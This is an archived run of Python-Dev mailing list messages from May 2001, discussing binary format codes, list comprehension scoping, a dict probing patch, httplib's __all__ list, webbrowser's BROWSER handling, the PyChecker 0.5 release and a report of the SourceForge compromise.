Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>
Message-ID: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>

Tim:

> On the fifth hand, I doubt anyone would want to add new % format codes for
> bases {2..36} - {2, 8, 10, 16}.

So, just add one general one:

  %m.nb

with n being the base. If n defaults to 2, you can read the "b"
as either "base" or "binary".

Literals:

  0b(5)21403       general
  0b11001101       binary

Conversion functions:

  base(x, n)       general
  bin(x)           equivalent to base(x, 2) (for symmetry with
                                             existing hex, oct)

Type slots:

  __base__(x, n)

Backwards compatibility measures:

  hex(x) --> base(x, 16)
  oct(x) --> base(x, 8)
  bin(x) --> base(x, 2)

  base(x, n) checks __hex__ and __oct__ slots for special cases
             of n=16 and n=8, falls back on __base__

There, that takes care of integers. Anyone want to do the
equivalent for floats ?-)

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From esr@thyrsus.com  Thu May 31 07:01:54 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 02:01:54 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Thu, May 31, 2001 at 05:17:16PM +1200
References: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com> <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>
Message-ID: <20010531020154.A4404@thyrsus.com>

Greg Ewing <greg@cosc.canterbury.ac.nz>:
> So, just add one general one:
> 
>   %m.nb
> 
> with n being the base. If n defaults to 2, you can read the "b"
> as either "base" or "binary".

I had a similar idea, but your version is more elegant.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The common argument that crime is caused by poverty is a kind of
slander on the poor.
	-- H. L. Mencken


From tim_one@email.msn.com  Thu May 31 07:20:21 2001
From: tim_one@email.msn.com (Tim Peters)
Date: Thu, 31 May 2001 02:20:21 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEIOKFAA.tim_one@email.msn.com>

[Greg Ewing]
> If we do this, we also need to consider whether we want
> to make the corresponding change to regular for-loops.
> Seems to me that all the reasons it's a good idea for
> listcomps apply to for-loops as well.

I expect there's no chance:  unlike listcomps, for-loops allow break
statements, and search loops that use the for index after a break (and out
of the loop!) are common.

> Another advantage of changing both together is that
> we can continue to describe listcomp semantics in terms
> of for-loops

But I'm afraid that's also an advantage of leaving both alone.

> instead of lambdas.
>
> Then we won't have to go into hiding until Guido dies or lifts
> the fatwah against us.

Death won't stop him -- he's Dutch <wink>.


From tim_one@email.msn.com  Thu May 31 07:28:04 2001
From: tim_one@email.msn.com (Tim Peters)
Date: Thu, 31 May 2001 02:28:04 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEIPKFAA.tim_one@email.msn.com>

[Greg Ewing]
> So, just add one general one:
>
>   %m.nb
>
> with n being the base. If n defaults to 2, you can read the "b"
> as either "base" or "binary".

Except .n has a different meaning already for integer conversions:

>>> "%.5d" % 2
'00002'
>>> "%.10o" % 377
'0000000571'
>>>

It would be inconsistent to hijack it to mean something else here.

> Literals:
>
>   0b(5)21403       general

I've actually got no use for bases outside {2, 8, 10, 16), and have never
heard a request for them either, so I'd be at best -0.  Better to stop
documenting the full truth about int() <0.9 wink>.

>   0b11001101       binary

+1.

> Conversion functions:
>
>   base(x, n)       general

-0, as above.

>   bin(x)           equivalent to base(x, 2) (for symmetry with
>                                              existing hex, oct)

+1 if binary literals are added.

> Type slots:
>
>   __base__(x, n)

Given the tenor of the above, add __bin__ and call it a day.

> Backwards compatibility measures:
>
>   hex(x) --> base(x, 16)
>   oct(x) --> base(x, 8)
>   bin(x) --> base(x, 2)
>
>   base(x, n) checks __hex__ and __oct__ slots for special cases
>              of n=16 and n=8, falls back on __base__
>
> There, that takes care of integers. Anyone want to do the
> equivalent for floats ?-)

Note that C99 introduces a hex notation for floats.


From mal@lemburg.com  Thu May 31 08:20:11 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 31 May 2001 09:20:11 +0200
Subject: [Python-Dev] SF hacked
References: <20010531035248.G690@xs4all.nl>
Message-ID: <3B15F0AB.34F2F664@lemburg.com>

Thomas Wouters wrote:
> 
> It *seems*, from this site:
> 
> http://66.92.75.28/~vladimir/themes-org.html
> 
> that SourceForge has been hacked, and more seriously than SF first admits
> (if I'm to believe the arrogant sprouting of some script-kiddie, anyway. :)
> And the same goes for apache.org, it looks like. Anyway, if anyone connected
> *from* any of sourceforge's machines to anywhere else, in the last couple of
> months, they'll be well advised to change their passwords and check for
> intruders. The same goes if you connect through ssh and (foolishly ;)
> allowed ssh-agent-forwarding to the SF machines. In that case, better check
> all the machines that ssh-agent would give you unpassworded access to for
> logins you don't recognize. The site above lists a number of sniffed
> passwords, in case you want to check, but there's no reason for the hacker
> not to have even more sniffed passwords lying about :)
> 
> And if you have a login on apache.org, you probably want to change your
> password in any case.... the above listed site has what seems to be a copy
> of the shadow password file.

FYI, the file's contents are no longer available it seems. Still,
SF seems to be alarmed about this:

*****************************************************************************
                I M P O R T A N T   P L E A S E     R E A D
*****************************************************************************

        If you are seeing this it's because we've failed over from
        pr-shell1.

        This is a failover server only.  As soon as pr-shell1 is better we
        will cut back to it.  So please do not start any daemon process
        that you care about.

                                                - The SF Staff


About the password change: this doesn't seem to be possible on
the failover machine (I get a permission denied message).

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Thu May 31 08:33:36 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 31 May 2001 09:33:36 +0200
Subject: [Python-Dev] One more dict trick
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com>
Message-ID: <3B15F3D0.AD646102@lemburg.com>

Tim Peters wrote:
> 
> If anyone has an app known or suspected to be sensitive to dict timing,
> please try the patch here.  Best I've been able to tell, it's a win.  But
> it's a radical change in approach, so I don't want to rush it.
> 
> This gets rid of the polynomial machinery entirely, along with the branches
> associated with updating the things, and the dictobject struct member
> holding the table's poly.  Instead it relies on that
> 
>     i = (5*i + 1) % n
> 
> is a full-period RNG whenever n is a power of 2 (that's what guarantees it
> will visit every slot), but perturbs that by adding in a few bits from the
> full hash code shifted right each time (that's what guarantees every bit of
> the hash code eventually influences the probe sequence, avoiding simple
> quadratic-time degenerate cases).

Cool idea... rips out all that algebra garble and replaces it with 
random beauty :-)

In any case, this will avoid use the trouble of having to check
those poly numbers every time Intel decides to bump the register
width by another factor of two ;-)

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From esr@thyrsus.com  Thu May 31 09:43:32 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 04:43:32 -0400
Subject: [Python-Dev] One more dict trick
In-Reply-To: <3B15F3D0.AD646102@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 09:33:36AM +0200
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com>
Message-ID: <20010531044332.B5026@thyrsus.com>

M.-A. Lemburg <mal@lemburg.com>:
> In any case, this will avoid use the trouble of having to check
> those poly numbers every time Intel decides to bump the register
> width by another factor of two ;-)

This seems unlikely.  

2^64 = 18446744073709551616, which is roughly 10 ^ 22.  Let's assume 
a memory density, of, say 2^20 machine words or roughly 8 megabytes per 
cubic centimeter (much, *much* better than we'll be able to do for the 
forseeable future -- remember power distribution and heat dissipation).
Then, approximating the cubic relation between a sphere's volume and area 
by lopping off a power of four, we see that 2^64 64-bit words of memory 
would occupy a sphere of roughly 2^(64 - 20 - 2) cm radius, or about 
17 million kilometers.  

This is roughly twice the diameter of the Sun.  64-bit computers
aren't going to run out of address space any time soon.

64-bit clocks counting seconds will turn over in approximately six
trillion years, long after the expansion of the Universe will have
dropped its energy density low enough to make computation...well, 
let's just say "difficult" and leave it at that.

Nobody needs 128 bits of integer or floating-point precision, either.
There's basically no source of data to compute with that's got
anywhere near 22 significant digits of accuracy -- 48 bits is
about the most people in scientific computing ever use.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

[President Clinton] boasts about 186,000 people denied firearms under
the Brady Law rules.  The Brady Law has been in force for three years.  In
that time, they have prosecuted seven people and put three of them in
prison.  You know, the President has entertained more felons than that at
fundraising coffees in the White House, for Pete's sake."
	-- Charlton Heston, FOX News Sunday, 18 May 1997


From mal@lemburg.com  Thu May 31 10:23:52 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 31 May 2001 11:23:52 +0200
Subject: [Python-Dev] One more dict trick
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com>
Message-ID: <3B160DA8.B9FF9AC2@lemburg.com>

"Eric S. Raymond" wrote:
> 
> M.-A. Lemburg <mal@lemburg.com>:
> > In any case, this will avoid us the trouble of having to check
> > those poly numbers every time Intel decides to bump the register
> > width by another factor of two ;-)
> 
> This seems unlikely.
> 
> 2^64 = 18446744073709551616, which is roughly 10 ^ 22.  Let's assume
> a memory density, of, say 2^20 machine words or roughly 8 megabytes per
> cubic centimeter (much, *much* better than we'll be able to do for the
> forseeable future -- remember power distribution and heat dissipation).

Where did you get those numbers from ? There are memory sticks
with 128 MB around and these measure about 2.5 cm^2 * 1 mm.

> Then, approximating the cubic relation between a sphere's volume and area
> by lopping off a power of four, we see that 2^64 64-bit words of memory
> would occupy a sphere of roughly 2^(64 - 20 - 2) cm radius, or about
> 17 million kilometers.
> 
> This is roughly twice the diameter of the Sun.  64-bit computers
> aren't going to run out of address space any time soon.
> 
> 64-bit clocks counting seconds will turn over in approximately six
> trillion years, long after the expansion of the Universe will have
> dropped its energy density low enough to make computation...well,
> let's just say "difficult" and leave it at that.
> 
> Nobody needs 128 bits of integer or floating-point precision, either.
> There's basically no source of data to compute with that's got
> anywhere near 22 significant digits of accuracy -- 48 bits is
> about the most people in scientific computing ever use.

Just you wait... someday marketing people will probably invent the
world memory facility and start assigning a few hundred
Terabytes for everyone on this planet to use for his/her data 
storage -- store once, use everywhere ;-)

Let's assume we have 12e9 people on this planet by that time, then
we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or
roughly 2^80 bytes per civilization.

Of course, they will want to run Python in order to manage
that data and so will all those Palm uses hooking up to the
facility... ;-)

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From esr@thyrsus.com  Thu May 31 11:31:07 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 06:31:07 -0400
Subject: [Python-Dev] One more dict trick
In-Reply-To: <3B160DA8.B9FF9AC2@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 11:23:52AM +0200
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> <3B160DA8.B9FF9AC2@lemburg.com>
Message-ID: <20010531063107.B5510@thyrsus.com>

M.-A. Lemburg <mal@lemburg.com>:
> > 2^64 = 18446744073709551616, which is roughly 10 ^ 22.  Let's assume
> > a memory density, of, say 2^20 machine words or roughly 8 megabytes per
> > cubic centimeter (much, *much* better than we'll be able to do for the
> > forseeable future -- remember power distribution and heat dissipation).
> 
> Where did you get those numbers from ? There are memory sticks
> with 128 MB around and these measure about 2.5 cm^2 * 1 mm.

Remember power distribution and heat dissipation.  You can't just figure 
volume of the memory ICs, you have to include power and cooling and structural
support too.  I eyeballed some DRAM modules I had lying around.

In any case, my figures aren't that sensitive to memory density.  If
I'm off by a factor of 64 the diameter of the memory sphere unly drops
by a factor of four (it's that cube-root relationship between volume
and radius).  So it's only half the radius of the Sun.  That's still
way, *way* more mass than all the planets in the Solar System put
together.

> Just you wait... someday marketing people will probably invent the
> world memory facility and start assigning a few hundred
> Terabytes for everyone on this planet to use for his/her data 
> storage -- store once, use everywhere ;-)
> 
> Let's assume we have 12e9 people on this planet by that time, then
> we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or
> roughly 2^80 bytes per civilization.

Nah.  Individual storage requirements would never get that large.
Bill Joy did a study on this once and figured out that human beings
can generate about 14GB of text during their lifetimes, max.  In a
system like the Web-on-steroids one you're supposing, higher-volume
stuff like streaming video or Linux-kernel archives would be stored
*once* with URLs pointing at them from peoples' individual stores.

One terabyte (2^40) per person leaves plenty of headroom (two orders
of magnitude larger).  We could still handle a world population of
2^24 or roughly 16 billion people.  (I think the size of the Library
of Congress has been estimated at several thousand terabytes.)
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

I don't like the idea that the police department seems bent on keeping
a pool of unarmed victims available for the predations of the criminal
class.
         -- David Mohler, 1989, on being denied a carry permit in NYC


From thomas@xs4all.net  Thu May 31 11:45:33 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Thu, 31 May 2001 12:45:33 +0200
Subject: [Python-Dev] One more dict trick
In-Reply-To: <20010531044332.B5026@thyrsus.com>; from esr@thyrsus.com on Thu, May 31, 2001 at 04:43:32AM -0400
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com>
Message-ID: <20010531124533.J690@xs4all.nl>

On Thu, May 31, 2001 at 04:43:32AM -0400, Eric S. Raymond wrote:
> M.-A. Lemburg <mal@lemburg.com>:

> > In any case, this will avoid use the trouble of having to check
> > those poly numbers every time Intel decides to bump the register
> > width by another factor of two ;-)

> This seems unlikely.  

Why ? Bumping register size doesn't mean Intel expects to use it all as
address space. They could be used for video-processing, or to represent a
modest range of rationals <wink>, or to help core 'net routers deal with
those nasty IPv6 addresses. I'm sure cryptomunchers would like bigger
registers as well.

Oh wait... I get it! You were trying to get yourself in the historybooks as
the guy that said "64 bits ought to be enough for everyone" :-)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From PyChecker <pychecker@metaslash.com>  Wed May 30 03:49:45 2001
From: PyChecker <pychecker@metaslash.com> (Neal Norwitz)
Date: Tue, 29 May 2001 22:49:45 -0400
Subject: [Python-Dev] PyChecker v0.5 released
Message-ID: <mailman.991257181.1069.clpa-moderators@python.org>

I was finally able to get version 0.5 out.  Just in case this is the
first time you are seeing this message, or you forgot what PyChecker is:

    PyChecker is a tool for finding common bugs in python source code.
    It finds problems that are typically caught by a compiler for less
    dynamic languages, like C and C++.  Because of the dynamic nature
    of python, some warnings may be incorrect; however,
    spurious warnings should be fairly infrequent.

The highlights are that code at the module scope is now checked.
There is still a problem with class variables and globals that are default
parameter values.  But other than that, there should be no more spurious
Variable unused warnings.

Code that makes PyChecker raise an exception should now be caught in most
cases and this produces a warning.  Please mail me if you find it blowing
up on your code.  The last line processed is shown in the warning, so
if you include some context, I can hopefully fix the problem.

Also, PyChecker should really use the files passed on the command line,
even if it uses the same module name internally.  So it will check your
warn.py, not PyChecker's warn.py.

Feedback, comments, criticisms, new ideas, better ideas, etc. are all 
greatly appreciated.  Thanks for everyone who has taken the time to mail me.
If you can think of common mistakes that are made that PyChecker doesn't
find, please let me know.

Here's the CHANGELOG:
  * Catch internal errors "gracefully" and turn into a warning
  * Add checking of most module scoped code
  * Add pychecker subdir to imports to prevent filename conflicts
  * Don't produce unused local variable warning if variable name == '_'
  * Add -g/--allglobals option to report all global warnings, not just first
  * Add -V/--varlist option to selectively ignore variable not used warnings
  * Add test script and expected results
  * Print all instructions when using debug (-d/--debug)
  * Overhaul internal stack handling so we can look for more problems
  * Fix glob'ing problems (all args after glob were ignored)
  * Fix spurious Base class __init__ not called
  * Fix exception on code like:  ['xxx'].index('xxx')
  * Fix exception on code like:  func(kw=(a < b))
  * Fix line numbers for import statements

PyChecker is available on Source Forge:
    Web page:           http://pychecker.sourceforge.net/
    Project page:       http://sourceforge.net/projects/pychecker/

Neal
--
pychecker@metaslash.com


From beazley@cs.uchicago.edu  Thu May 31 14:34:57 2001
From: beazley@cs.uchicago.edu (David Beazley)
Date: Thu, 31 May 2001 08:34:57 -0500 (CDT)
Subject: [Python-Dev] RE: Iteration variables and list comprehensions
In-Reply-To: <E155KrW-00029v-00@mail.python.org>
References: <E155KrW-00029v-00@mail.python.org>
Message-ID: <15126.18561.448105.608783@gargoyle.cs.uchicago.edu>

Greg Ewing writes: 
 > Another advantage of changing both together is that
 > we can continue to describe listcomp semantics in terms
 > of for-loops instead of lambdas.

Is this really an advantage?  To me, the lambda semantics are a lot
more intuitive in terms of matching the way that list comprehensions
are actually used and ought to work (although I will agree that the
for-loop explanation is a good way to describe the internals of what a
list comprehension actually does).

I think I would be opposed to changing normal for-loop semantics to
match any change made in list-comprehensions. There are too many cases
where you use a loop variable after finishing a loop and I suspect
that this would break a huge amount of code. For example:

    for i in r:
        ...
        if whatever: break

    print i

Besides, the semantic mismatch created between a listcomp and a
for-loop pales in comparison to the mismatch that currently exists
between the behavior of listcomps and all of the other operators.  Of
course, that's just my opinion--I could be wrong.

 > Then we won't have to go 
 > into hiding until Guido dies or lifts the fatwah against us.

fatwah?  Uh...  should I start talking to the witness protection
program folks?

Cheers,

Dave


From skip@pobox.com (Skip Montanaro)  Thu May 31 19:02:51 2001
From: skip@pobox.com (Skip Montanaro) (Skip Montanaro)
Date: Thu, 31 May 2001 13:02:51 -0500
Subject: [Python-Dev] Re: 2.1 strangness
In-Reply-To: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
References: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
Message-ID: <15126.34635.67975.31473@beluga.mojam.com>

>>>>> "Robin" == Robin Becker <robin@jessikat.fsnet.co.uk> writes:

    Robin> from httplib import *

    Robin> class Bongo(HTTPConnection):
    Robin>         pass
    ...
    Robin> NameError: name 'HTTPConnection' is not defined

It was a brain fart on my part when creating httplib.__all__.
HTTPConnection was not included in that list.  I will check in a fix.
In the 2.1 release __all__ was defined as 

    __all__ = ["HTTP"]

I have changed that to

    __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection",
	       "HTTPException", "NotConnected", "UnknownProtocol",
	       "UnknownTransferEncoding", "IllegalKeywordArgument",
	       "UnimplementedFileMode", "IncompleteRead",
	       "ImproperConnectionState", "CannotSendRequest", "CannotSendHeader",
	       "ResponseNotReady", "BadStatusLine", "error"]

and will check the change into CVS shortly. (Thomas, keep an eye open for
this as an addition to 2.1.1.)

The workaround I would choose is to not use from "httplib import *":

    import httplib

    class Bongo(httplib.HTTPConnection):
        pass

    Robin> Changing the * to HTTPConnection in ttt.py removes the problem.

Yup, that will also work.

Before anyone asks, "Who died and make Skip King?", the scenario as I recall
it was that the semantics of __all__ got settled on during discussions on
python-dev (the goal of __all__ being to minimize namespace pollution by
"from ... *"), but nobody stepped up immediately to do the gtunt work, so I
volunteered.  The problem in relying on one person (well, at least this one
person) to do this was that I had only the following tools at my disposal to
decide what belonged in __all__:

    * what was documented in the lib reference manual (which was at times
      incomplete)
    * my experience with the various modules (some of which was specialized,
      some of which was nonexistent)
    * the standard library (which generally doesn't use "from ... *" much)
    * input from python-dev (whose members also appear not to use "from
      ... *" very liberally)

In retrospect, I probably should have polled c.l.py with a summary of what I
came up with before the 2.1 ship date.  If people would like me to do that
now (before 2.2 gets anywhere close to release) to try and fill in as many
missing symbols as possible, let me know.

-- 
Skip Montanaro (skip@pobox.com)
(847)971-7098


From skip@pobox.com (Skip Montanaro)  Thu May 31 19:06:01 2001
From: skip@pobox.com (Skip Montanaro) (Skip Montanaro)
Date: Thu, 31 May 2001 13:06:01 -0500
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
Message-ID: <15126.34825.167026.520535@beluga.mojam.com>

I just updated httplib.py to expand the list of names in its __all__ list.
I was operating on version 1.34.  After the checkin I am looking at version
1.34.2.1.  I see that Lib/CVS/Tag exists in my directory tree and says
"release21-maint".  Did I muff it?  If so, how should I do an unmuff
operation?

Skip


From robin@jessikat.fsnet.co.uk  Thu May 31 19:33:02 2001
From: robin@jessikat.fsnet.co.uk (Robin Becker)
Date: Thu, 31 May 2001 19:33:02 +0100
Subject: [Python-Dev] Re: 2.1 strangness
In-Reply-To: <15126.34635.67975.31473@beluga.mojam.com>
References: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
 <15126.34635.67975.31473@beluga.mojam.com>
Message-ID: <s8$qoXAe5oF7EwbX@jessikat.fsnet.co.uk>

In message <15126.34635.67975.31473@beluga.mojam.com>, Skip Montanaro
<skip@pobox.com> writes
>>>>>> "Robin" == Robin Becker <robin@jessikat.fsnet.co.uk> writes:
>
>    Robin> from httplib import *
>
>    Robin> class Bongo(HTTPConnection):
>    Robin>         pass
>    ...
>    Robin> NameError: name 'HTTPConnection' is not defined
>
>It was a brain fart on my part when creating httplib.__all__.
>HTTPConnection was not included in that list.  I will check in a fix.
>In the 2.1 release __all__ was defined as 
>
>    __all__ = ["HTTP"]
>
>I have changed that to
>
>    __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection",
>              "HTTPException", "NotConnected", "UnknownProtocol",
>              "UnknownTransferEncoding", "IllegalKeywordArgument",
>              "UnimplementedFileMode", "IncompleteRead",
>              "ImproperConnectionState", "CannotSendRequest", 
>"CannotSendHeader",
>              "ResponseNotReady", "BadStatusLine", "error"]

thanks; I'm still a bit puzzled as to the exact semantics. It just looks
wrong. Is __all__ the only way to get things into the * version of
import? Presumably HTTPConnection is being marked as a potential global
in the compile phase.
-- 
Robin Becker


From skip@pobox.com (Skip Montanaro)  Thu May 31 20:27:12 2001
From: skip@pobox.com (Skip Montanaro) (Skip Montanaro)
Date: Thu, 31 May 2001 14:27:12 -0500
Subject: [Python-Dev] Re: 2.1 strangness
In-Reply-To: <s8$qoXAe5oF7EwbX@jessikat.fsnet.co.uk>
References: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
 <15126.34635.67975.31473@beluga.mojam.com>
 <s8$qoXAe5oF7EwbX@jessikat.fsnet.co.uk>
Message-ID: <15126.39696.370516.926735@beluga.mojam.com>

    Robin> thanks; I'm still a bit puzzled as to the exact semantics. It
    Robin> just looks wrong. Is __all__ the only way to get things into the
    Robin> * version of import?

Essentially, yes.  If you want to just dispense with it __all__together
(=:-o), you can textually replace __all__ with ___all__ in each of the
standard library modules:

    cd /usr/local/lib/python2.1
    for f in *.py ; do
	sed -e 's/___*all__/___all__/g' < $f > $f.tmp
	mv $f.tmp $f
    done

Note that I didn't touch any files in directories under the basic Lib
directory.

    Robin> Presumably HTTPConnection is being marked as a potential global
    Robin> in the compile phase.

It has nothing to do with module compilation.  The contents of __all__ are a
static thing in the text of the .py file, and thusfar almost entirely due to
me studying the inputs at hand and making a decision about what belonged and
what didn't.  Some python-dev people caught ommissions and added them before
the 2.1 release.  Other than that, the mistakes are all mine.

I had some misgivings about the whole thing during the midst of the task and
still do, but grumbled once and completed it.

Skip


From skip@pobox.com (Skip Montanaro)  Thu May 31 20:57:21 2001
From: skip@pobox.com (Skip Montanaro) (Skip Montanaro)
Date: Thu, 31 May 2001 14:57:21 -0500
Subject: [Python-Dev] weird webbrowser behavior
Message-ID: <15126.41505.987887.477670@beluga.mojam.com>

I'm using Gnome under Mandrake 8.0 and getting very strange results using
webbrowser (indirectly via pydoc).  Apparently, Gnome's init code sets the
BROWSER environment variable to "nautilus" (much to my surprise) and
webbrowser trusts it as the god's honest truth, even though nautilus has not
been registered with the webbrowser module (am I supposed to add that sort
of stuff to site.py?).  Accordingly, _tryorder is ['nautilus'] but doesn't
appear in _browser.keys() is ['lynx', 'links', 'netscape', 'kfm',
'mozilla'].  I think webbrowser should either ignore elements of BROWSER if
they have not previously been registered (and can't be found by _iscommand)
or try to register them using GenericBrowser.  Users are apparently not the
only people setting BROWSER, so the comment in the code:

    # It's the user's responsibility to register handlers for any unknown
    # browser referenced by this value, before calling open().

seems like flawed logic to me.

Skip


From esr@thyrsus.com  Thu May 31 21:08:21 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 16:08:21 -0400
Subject: [Python-Dev] weird webbrowser behavior
In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com>; from skip@pobox.com on Thu, May 31, 2001 at 02:57:21PM -0500
References: <15126.41505.987887.477670@beluga.mojam.com>
Message-ID: <20010531160821.A10314@thyrsus.com>

Skip Montanaro <skip@pobox.com>:
> I think webbrowser should either ignore elements of BROWSER if
> they have not previously been registered (and can't be found by _iscommand)
> or try to register them using GenericBrowser.  Users are apparently not the
> only people setting BROWSER, so the comment in the code:

Fred Drake and I are co-responsible for that code.  If you want to patch it
to do this, I won't object.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"They that can give up essential liberty to obtain a little temporary 
safety deserve neither liberty nor safety."
	-- Benjamin Franklin, Historical Review of Pennsylvania, 1759.


From fdrake@acm.org  Thu May 31 21:18:26 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 31 May 2001 16:18:26 -0400 (EDT)
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
In-Reply-To: <15126.34825.167026.520535@beluga.mojam.com>
References: <15126.34825.167026.520535@beluga.mojam.com>
Message-ID: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com>

Skip Montanaro writes:
 > I just updated httplib.py to expand the list of names in its __all__ list.
 > I was operating on version 1.34.  After the checkin I am looking at version
 > 1.34.2.1.  I see that Lib/CVS/Tag exists in my directory tree and says
 > "release21-maint".  Did I muff it?  If so, how should I do an unmuff
 > operation?

  If that's really a muff, revert the change:

        cd .../Lib/
        cvs diff -r1.34.2.1 -r1.34 httplib.py | patch

and commit the new version as 1.34.2.2:

        cvs commit -m 'unmuff...' httplib.py


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From skip@pobox.com (Skip Montanaro)  Thu May 31 21:30:22 2001
From: skip@pobox.com (Skip Montanaro) (Skip Montanaro)
Date: Thu, 31 May 2001 15:30:22 -0500
Subject: [Python-Dev] weird webbrowser behavior
In-Reply-To: <20010531160821.A10314@thyrsus.com>
References: <15126.41505.987887.477670@beluga.mojam.com>
 <20010531160821.A10314@thyrsus.com>
Message-ID: <15126.43486.320228.376505@beluga.mojam.com>

    Eric> Fred Drake and I are co-responsible for that code.  If you want to
    Eric> patch it to do this, I won't object.

Here's a first pass that seems to work for me:

    https://sourceforge.net/tracker/index.php?func=detail&aid=429136&group_id=5470&atid=305470

though it doesn't attempt to recover if _tryorder winds up empty.

Skip


From skip@pobox.com (Skip Montanaro)  Thu May 31 21:48:40 2001
From: skip@pobox.com (Skip Montanaro) (Skip Montanaro)
Date: Thu, 31 May 2001 15:48:40 -0500
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
In-Reply-To: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com>
References: <15126.34825.167026.520535@beluga.mojam.com>
 <15126.42770.17954.452663@cj42289-a.reston1.va.home.com>
Message-ID: <15126.44584.300357.360209@beluga.mojam.com>

    >> I just updated httplib.py to expand the list of names in its __all__
    >> list.  I was operating on version 1.34.  After the checkin I am
    >> looking at version 1.34.2.1.  I see that Lib/CVS/Tag exists in my
    >> directory tree and says "release21-maint".  Did I muff it?  If so,
    >> how should I do an unmuff operation?

    Fred>   If that's really a muff, revert the change:

    Fred>         cd .../Lib/
    Fred>         cvs diff -r1.34.2.1 -r1.34 httplib.py | patch

    Fred> and commit the new version as 1.34.2.2:

    Fred>         cvs commit -m 'unmuff...' httplib.py

Functionally, the checkin isn't a muff (it does have the change I intended),
but I was worried about the version number.  Should I have checked it in as
version 1.34.2.1 or 1.35?

Skip


From fdrake@acm.org  Thu May 31 22:00:34 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 31 May 2001 17:00:34 -0400 (EDT)
Subject: [Python-Dev] weird webbrowser behavior
In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com>
References: <15126.41505.987887.477670@beluga.mojam.com>
 <20010531160821.A10314@thyrsus.com>
Message-ID: <15126.45298.666556.20710@cj42289-a.reston1.va.home.com>

Skip Montanaro writes:
 > or try to register them using GenericBrowser.  Users are apparently not the
 > only people setting BROWSER, so the comment in the code:
 > 
 >     # It's the user's responsibility to register handlers for any unknown
 >     # browser referenced by this value, before calling open().
 > 
 > seems like flawed logic to me.

Eric S. Raymond writes:
 > Fred Drake and I are co-responsible for that code.  If you want to patch it
 > to do this, I won't object.

  I wouldn't object either.  I *do* object to the system setting that
variable by default by either Mandrake or Gnome -- that's just stupid
and inconsiderate of the user.
  Now, if anyone can provide support for Nautilis, I won't object to
that either.  Unfortunately, Mandrake's installer stinks at upgrading
(it couldn't seem to locate my 7.2 installation) and I don't have the
time to figure that out.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake@acm.org  Thu May 31 22:04:30 2001
